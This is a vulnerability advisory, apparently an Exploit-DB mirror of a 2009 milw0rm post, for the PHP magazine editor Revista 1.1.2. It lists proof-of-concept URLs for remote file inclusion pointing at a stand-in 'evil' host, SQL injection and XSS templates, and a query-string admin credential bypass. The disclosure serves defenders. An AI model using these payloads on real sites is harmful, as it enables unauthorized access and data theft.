Revista 1.1.2

vendor:

Revista

by:

Sirdarckcat

7,5

CVSS

HIGH

Remote File Inclusion, SQLi, Credentials Bypass, XSS

89, 79, 264, 79

CWE

Product Name: Revista

Affected Version From: 1.1.2

Affected Version To: 1.1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:php_org_mx:revista

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Revista is a simple spanish PHP magazine editor. It suffers from multiple vulnerabilities, including Remote File Inclusion, SQLi, Credentials Bypass, and XSS. Remote File Inclusion can be exploited by sending a malicious URL to the 'adodb' parameter. SQLi can be exploited by sending malicious SQL queries to the 'id_temas', 'cadena', 'id_autor', 'email', and 'id_articulo' parameters. Credentials Bypass can be exploited by sending a malicious URL to the 'ID_ADMIN' and 'SUPER_ADMIN' parameters. XSS can be exploited by sending malicious code to the 'cadena' and 'email' parameters.

Mitigation:

Input validation should be used to prevent malicious input from being sent to the application. Access control should be used to prevent unauthorized access to the application.

Source

Exploit-DB raw data:

Discovered by Sirdarckcat from elhacker.net

------------------------------------------------------------------------
------------

Revista 1.1.2

http://php-revista.sourceforge.org

------------------------------------------------------------------------
------------

Revista is a simple spanish PHP magazine editor.

It was done by php.org.mx

It suffers of multiple vulnerabilities.

------------------------------------------------------------------------
------------

Remote File Inclusion

http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script

------------------------------------------------------------------------
------------

SQLi

http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]

http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]

http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]

http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]

http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]

------------------------------------------------------------------------
------------

Credentials Bypass

http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1

------------------------------------------------------------------------
------------

XSS

http://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>

http://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>

------------------------------------------------------------------------

# milw0rm.com [2009-04-14]